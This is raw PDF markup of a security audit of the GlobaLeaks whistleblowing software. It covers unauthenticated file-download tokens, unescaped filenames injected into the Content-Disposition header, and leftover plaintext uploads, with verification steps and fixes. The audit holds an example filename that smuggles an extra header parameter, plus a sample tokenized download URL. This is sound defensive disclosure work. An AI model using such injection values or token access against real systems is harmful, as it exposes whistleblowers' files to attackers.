Tj T* ET Q Q q 1 0 0 1 62.69291 612.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Feasibility:) Tj T* ET Q Q q 1 0 0 1 62.69291 558.0236 cm q BT 1 0 0 1 0 38 Tm .60332 Tw 12 TL /F1 10 Tf 0 0 0 rg (Because the file download token appears in the URL, an attacker may find it in the user's web browser's) Tj T* 0 Tw 2.321318 Tw (download history. The ) Tj /F4 10 Tf (Tor Browser Bundle ) Tj /F1 10 Tf (does not keep history, except for the "Undo Close Tab") Tj T* 0 Tw 1.649985 Tw (feature, which exists until the browser is restarted. Most regular browsers save the URL to history by) Tj T* 0 Tw (default.) Tj T* ET Q Q q 1 0 0 1 62.69291 528.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .919535 Tw (The attacker may also be able to extract the token via a timing side channel, or to guess it if it was not) Tj T* 0 Tw (generated by a cryptographically-secure random number generator.) Tj T* ET Q Q q 1 0 0 1 62.69291 486.0236 cm q BT 1 0 0 1 0 26 Tm 1.40784 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (This issue has been confirmed by copying the collection URL, logging out, restarting ) Tj /F4 10 Tf (Tor) Tj T* 0 Tw .278735 Tw (Browser Bundle) Tj /F1 10 Tf (, then visiting the URL. The zip file containing all of the Tip's files downloads successfully.) Tj T* 0 Tw (An individual-file download URL passed a similar test using ) Tj /F4 10 Tf (wget) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 468.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 450.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (globaleaks/handlers/collection.py) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (CollectionDownload ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (@unauthenticated) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 356.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 84 re B* Q q BT 1 0 0 1 0 62 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (class) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf 0 0 1 rg (CollectionDownload) Tj /F3 10 Tf 0 0 0 rg (\() Tj (BaseHandler) Tj (\):) Tj T* T* ( ) Tj .666667 .133333 1 rg (@transport_security_check) Tj 0 0 0 rg (\() Tj .729412 .129412 .129412 rg ('wb') Tj 0 0 0 rg (\)) Tj T* ( ) Tj .666667 .133333 1 rg (@unauthenticated) Tj 0 0 0 rg T* ( ) Tj .666667 .133333 1 rg (@inlineCallbacks) Tj 0 0 0 rg T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (get) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (,) Tj ( ) Tj (token) Tj (,) Tj ( ) Tj (path) Tj (,) Tj ( ) Tj (compression) Tj (\):) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 336.8236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Given the collection URL, which looks like...) Tj T* ET Q Q q 1 0 0 1 62.69291 305.3849 cm q q .930106 0 0 .930106 0 0 cm q 1 0 0 1 6.6 7.095962 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 504 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F3 10 Tf 12 TL (http://uzekbw3injzwsox2.onion/rtip/9e0b4f04-c5b2-45ed-afae-6b38eb32529e/collection) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 261.3849 cm q BT 1 0 0 1 0 26 Tm .884751 Tw 12 TL /F1 10 Tf 0 0 0 rg (...a request to that URL will retrieve the zip file, even if the requester is not logged in as a receiver with) Tj T* 0 Tw 9.945318 Tw (access to the Tip. 
The string in the URL is generated and set to expire in) Tj T* 0 Tw /F3 10 Tf (globaleaks/handlers/base.py ) Tj /F1 10 Tf (as follows:) Tj T* ET Q Q q 1 0 0 1 62.69291 120.1849 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 132 re B* Q q BT 1 0 0 1 0 110 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\() Tj (uuid4) Tj (\(\)\)) Tj T* T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_val) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (id_val) Tj T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_type) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('rtip') Tj 0 0 0 rg ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# this is just a debug/informative information) Tj /F3 10 Tf 0 0 0 rg T* T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (expireCallbacks) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj ([]) Tj T* T* (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj ([) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj (]) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj 0 0 0 rg T* T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (_expireCall) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (reactor) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (callLater) Tj (\() Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (tokenTimeout) Tj (,) Tj ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (expire) Tj (\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 100.1849 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Likewise, in ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (Download ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (@unauthenticated) Tj /F1 10 Tf (:) Tj T* ET Q Q endstream endobj % 'R360': class PDFStream 360 0 obj % page stream << /Length 4528 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 679.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 84 re B* Q q BT 1 0 0 1 0 62 Tm 12 TL /F3 10 Tf .666667 .133333 1 rg (@transport_security_check) Tj 0 0 0 rg (\() Tj .729412 .129412 .129412 rg ('wb') Tj 0 0 0 rg (\)) Tj T* .666667 .133333 1 rg (@unauthenticated) Tj 0 0 0 rg T* .666667 .133333 1 rg (@inlineCallbacks) Tj 0 0 0 rg T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (get) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (,) Tj ( ) Tj (tip_id) Tj (,) Tj ( ) Tj (rfile_token) Tj (,) Tj ( ) Tj .4 .4 .4 rg (*) Tj 0 0 0 rg (uriargs) Tj (\):) Tj T* T* ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# tip_id needed to authorized the download) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 635.8236 cm q BT 1 0 0 1 0 26 Tm 1.045697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The comment is incorrect: for ) Tj /F3 10 Tf (tip_id ) Tj /F1 10 Tf (the attacker need only supply a string matching ) Tj /F3 10 Tf (uuid_regexp) Tj T* 0 Tw 3.91664 Tw /F1 10 Tf (from ) Tj /F3 10 Tf (globaleaks/handlers/base.py) Tj /F1 10 Tf (. Like the collection token, ) Tj /F3 10 Tf (rfile_token ) Tj /F1 10 Tf (must match a) Tj T* 0 Tw /F3 10 Tf (uuid4\(\) ) Tj /F1 10 Tf (generated and set to expire in ) Tj /F3 10 Tf (globaleaks/handlers/base.py) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 593.8236 cm q BT 1 0 0 1 0 26 Tm 1.233735 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(We considered whether ) Tj /F3 10 Tf (callLater ) Tj /F1 10 Tf (to expire the token might be problematic as well: if the server is) Tj T* 0 Tw 1.156457 Tw (restarted before the expiration, could the URL still be valid? But no, the expirations and the tokens are) Tj T* 0 Tw (both lost in that case.\)) Tj T* ET Q Q q 1 0 0 1 62.69291 575.8236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 533.8236 cm q BT 1 0 0 1 0 26 Tm 2.54229 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should mitigate ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets) Tj T* 0 Tw 1.690888 Tw (Through Side-Channel Attacks ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (Issue K: Secrets Generated with Non-CSPRNG) Tj 0 0 0 rg (. Receivers should) Tj T* 0 Tw (clear their browser's history and cache after downloading files.) Tj T* ET Q Q q 1 0 0 1 62.69291 515.8236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 485.8236 cm q BT 1 0 0 1 0 14 Tm 1.541235 Tw 12 TL /F1 10 Tf 0 0 0 rg (To fix this issue, ) Tj /F4 10 Tf (GLBackend ) Tj /F1 10 Tf (should check that the user is authenticated \(logged in\) and should have) Tj T* 0 Tw (access to the file:) Tj T* ET Q Q q 1 0 0 1 62.69291 479.8236 cm Q q 1 0 0 1 62.69291 479.8236 cm Q q 1 0 0 1 62.69291 467.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Check the downloader's ) Tj /F3 10 Tf (role) Tj /F1 10 Tf (. It should be ) Tj /F3 10 Tf (receiver) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 461.8236 cm Q q 1 0 0 1 62.69291 425.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.531235 Tw (Track which files each receiver should have access to, to check against when a receiver tries to) Tj T* 0 Tw 3.446651 Tw (download files. Each receiver should have access only to those files granted to them by a) Tj T* 0 Tw (whistleblower.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 425.8236 cm Q q 1 0 0 1 62.69291 407.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET Q Q q 1 0 0 1 62.69291 401.8236 cm Q q 1 0 0 1 62.69291 401.8236 cm Q q 1 0 0 1 62.69291 389.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #826) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 389.8236 cm Q q 1 0 0 1 62.69291 389.8236 cm Q endstream endobj % 'R361': class PDFStream 361 0 obj % page stream << /Length 8669 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue G. Unescaped Characters Put Into ) Tj /F8 12.5 Tf (Content-Disposition ) Tj /F5 12.5 Tf (Header) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET Q Q q 1 0 0 1 62.69291 690.0236 cm q BT 1 0 0 1 0 26 Tm .930574 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (When the whistleblower uploads a file, they provide its file name. That file name is stored in) Tj T* 0 Tw .495984 Tw (the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (database. 
When the receiver downloads the file, the name provided will be reflected into) Tj T* 0 Tw (the HTTP headers that are sent to the receiver, without being escaped.) Tj T* ET Q Q q 1 0 0 1 62.69291 648.0236 cm q BT 1 0 0 1 0 26 Tm 1.96186 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (It may be possible to perform an HTTP response splitting attack on a receiver, which could) Tj T* 0 Tw .374692 Tw (enable cross-site scripting attacks. We have not confirmed that it is possible, since it may not be possible) Tj T* 0 Tw (to inject newlines into the header, but it is prudent to assume that it is exploitable.) Tj T* ET Q Q q 1 0 0 1 62.69291 618.0236 cm q BT 1 0 0 1 0 14 Tm .134987 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs to have uploaded a file with a name of their choice, then have the) Tj T* 0 Tw (victim receiver download the file.) Tj T* ET Q Q q 1 0 0 1 62.69291 588.0236 cm q BT 1 0 0 1 0 14 Tm 1.485697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The attacker simply needs to use the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (whistleblower interface to upload a file.) Tj T* 0 Tw (They may use a browser extension like ) Tj /F4 10 Tf (TamperData ) Tj /F1 10 Tf (to choose a custom filename.) Tj T* ET Q Q q 1 0 0 1 62.69291 546.0236 cm q BT 1 0 0 1 0 26 Tm .852126 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection and by trying it with the ) Tj /F4 10 Tf (TamperData ) Tj /F1 10 Tf (Firefox extension.) Tj T* 0 Tw 2.089984 Tw (We verified that characters pass into the filename without escaping, but did not verify that response) Tj T* 0 Tw (splitting is possible.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 528.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 498.0236 cm q BT 1 0 0 1 0 14 Tm 1.773059 Tw 12 TL /F1 10 Tf 0 0 0 rg (There are two places where the uploaded filename is added to the ) Tj /F3 10 Tf (Content-Disposition ) Tj /F1 10 Tf (header) Tj T* 0 Tw (without being escaped. First, in ) Tj /F3 10 Tf (handlers/files.py) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 423.5195 cm q q .908526 0 0 .908526 0 0 cm q 1 0 0 1 6.6 7.264512 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 516 72 re B* Q q BT 1 0 0 1 0 50 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('X-Download-Options') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('noopen') Tj 0 0 0 rg (\)) Tj T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Type') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('application/octet-stream') Tj 0 0 0 rg (\)) Tj T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Length') Tj 0 0 0 rg (,) Tj ( ) Tj (rfile) Tj ([) Tj .729412 .129412 .129412 rg ('size') Tj 0 0 0 rg (]\)) Tj T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Etag') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('") Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg ("') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (rfile) Tj ([) Tj .729412 .129412 .129412 rg ('sha2sum') Tj 0 0 0 rg (]\)) Tj T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Disposition') Tj 0 0 0 rg (,) Tj .729412 .129412 .129412 rg ('attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj .733333 .4 .533333 rg (%s) Tj .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (rfile) Tj ([) Tj .729412 .129412 .129412 rg ('name') Tj 0 0 0 rg (]\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 403.5195 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Second, in ) Tj /F3 10 Tf (handlers/collection.py) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 334.3195 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 60 re B* Q q BT 1 0 0 1 0 38 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('X-Download-Options') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('noopen') Tj 0 0 0 rg (\)) Tj T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Type') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('application/octet-stream') Tj 0 0 0 rg (\)) Tj T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Disposition') Tj 0 0 0 rg (,) Tj .729412 .129412 .129412 rg ('attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg T* ( ) Tj (opts) Tj ([) Tj .729412 .129412 .129412 rg ('filename') Tj 0 0 0 rg (]) Tj ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (') Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg (\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 314.3195 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The attacker can upload a file, setting the Content-Disposition header to:) Tj T* ET Q Q q 1 0 0 1 62.69291 281.1195 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F3 10 Tf 12 TL (Content-Disposition: attachment; filename="test"; size="1000000000") Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 249.1195 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.037485 Tw (When the receiver downloads the file, the header will be as follows. The "size" parameter has been) Tj T* 0 Tw (injected:) Tj T* ET Q Q q 1 0 0 1 62.69291 215.9195 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F3 10 Tf 12 TL (Content-Disposition: attachment; filename="test"; size="1000000000") Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 195.9195 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (If the receiver has a PGP key, the server will append ".pgp" to the header.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 141.9195 cm q BT 1 0 0 1 0 38 Tm .220751 Tw 12 TL /F1 10 Tf 0 0 0 rg (We also note that the HTTP headers are parsed incorrectly in ) Tj /F3 10 Tf (globaleaks/handlers/base.py ) Tj /F1 10 Tf (in the) Tj T* 0 Tw 11.62098 Tw /F3 10 Tf (_on_headers\(\) ) Tj /F1 10 Tf (method. The following regular expression is used to parse the) Tj T* 0 Tw .893555 Tw /F3 10 Tf (Content-Disposition: ) Tj /F1 10 Tf (header; it is incorrect because it matches all characters up to the ) Tj /F4 10 Tf (last ) Tj /F1 10 Tf (quote,) Tj T* 0 Tw (when it should match all characters up to the ) Tj /F4 10 Tf (next ) Tj /F1 10 Tf (non-escaped quote.) Tj T* ET Q Q q 1 0 0 1 62.69291 96.7195 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 36 re B* Q q BT 1 0 0 1 0 14 Tm 12 TL /F3 10 Tf 0 0 0 rg (content_disposition_re) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (re) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (compile) Tj (\() Tj .729412 .129412 .129412 rg (r"attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (\(.+\)) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg (,) Tj T* ( ) Tj (re) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (IGNORECASE) Tj (\)) Tj T* ET Q Q Q Q Q endstream endobj % 'R362': class PDFStream 362 0 obj % page stream << /Length 3249 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 717.0236 cm q BT 1 0 0 1 0 38 Tm .328221 Tw 12 TL /F1 10 Tf 0 0 0 rg (When the whistleblower uploads a file with special characters in it, it appears to be ) Tj /F3 10 Tf (URL) Tj /F1 10 Tf (-encoded, but this) Tj T* 0 Tw 2.847045 Tw (is only because the browser \(or JavaScript\) is ) Tj /F3 10 Tf (URL) Tj /F1 10 Tf (-encoding it as it is sent. 
The server does not) Tj T* 0 Tw .778651 Tw /F3 10 Tf (URL) Tj /F1 10 Tf (-decode the filename upon receiving the upload, so special characters in the filename are shown as) Tj T* 0 Tw (percent escape codes in the user interface.) Tj T* ET Q Q q 1 0 0 1 62.69291 699.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 669.0236 cm q BT 1 0 0 1 0 14 Tm 2.46561 Tw 12 TL /F1 10 Tf 0 0 0 rg (There is no easy way \(i.e. that doesn't involve modifying the source code\) for a ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node) Tj T* 0 Tw (administrator to mitigate this issue.) Tj T* ET Q Q q 1 0 0 1 62.69291 639.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .536235 Tw (The filename is displayed to the receiver before they download it, so receivers can protect themselves to) Tj T* 0 Tw (some degree by refusing to download files with odd-looking names.) Tj T* ET Q Q q 1 0 0 1 62.69291 621.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 567.0236 cm q BT 1 0 0 1 0 38 Tm .43061 Tw 12 TL /F1 10 Tf 0 0 0 rg (We recommend not storing the submitted file name at all, and instead having ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (choose the file) Tj T* 0 Tw 1.109069 Tw (names \(e.g. ) Tj /F3 10 Tf (Upload1.zip) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (Upload2.zip) Tj /F1 10 Tf (...\). This worsens usability; but discarding the filename does) Tj T* 0 Tw 1.99311 Tw (fix this issue, with the additional benefit of not disclosing the uploaded filenames to an attacker who) Tj T* 0 Tw (compromises the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q BT 1 0 0 1 0 26 Tm .414983 Tw 12 TL /F1 10 Tf 0 0 0 rg (If using ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (-chosen filenames is too much of a usability problem, then we recommend specifying) Tj T* 0 Tw 3.82284 Tw (the file name in the ) Tj /F3 10 Tf (URL ) Tj /F1 10 Tf (instead of the ) Tj /F3 10 Tf (Content-Disposition ) Tj /F1 10 Tf (header, as described in ) Tj 0 0 .501961 rg (this) Tj T* 0 Tw (StackOverflow answer) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 507.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed, but may need further analysis.) Tj T* ET Q Q q 1 0 0 1 62.69291 501.0236 cm Q q 1 0 0 1 62.69291 501.0236 cm Q q 1 0 0 1 62.69291 489.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #832) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 489.0236 cm Q q 1 0 0 1 62.69291 489.0236 cm Q endstream endobj % 'R363': class PDFStream 363 0 obj % page stream << /Length 4222 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 735.0236 cm q BT 1 0 0 1 0 17.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue H. Plaintext File Kept on Server when Whistleblower Does Not Finish) Tj T* (Submitting Tip) Tj T* ET Q Q q 1 0 0 1 62.69291 717.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET Q Q q 1 0 0 1 62.69291 687.0236 cm q BT 1 0 0 1 0 14 Tm 1.85561 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (If a Tip submission is aborted prior to completion, but after file upload, the uploaded files) Tj T* 0 Tw (remain indefinitely.) 
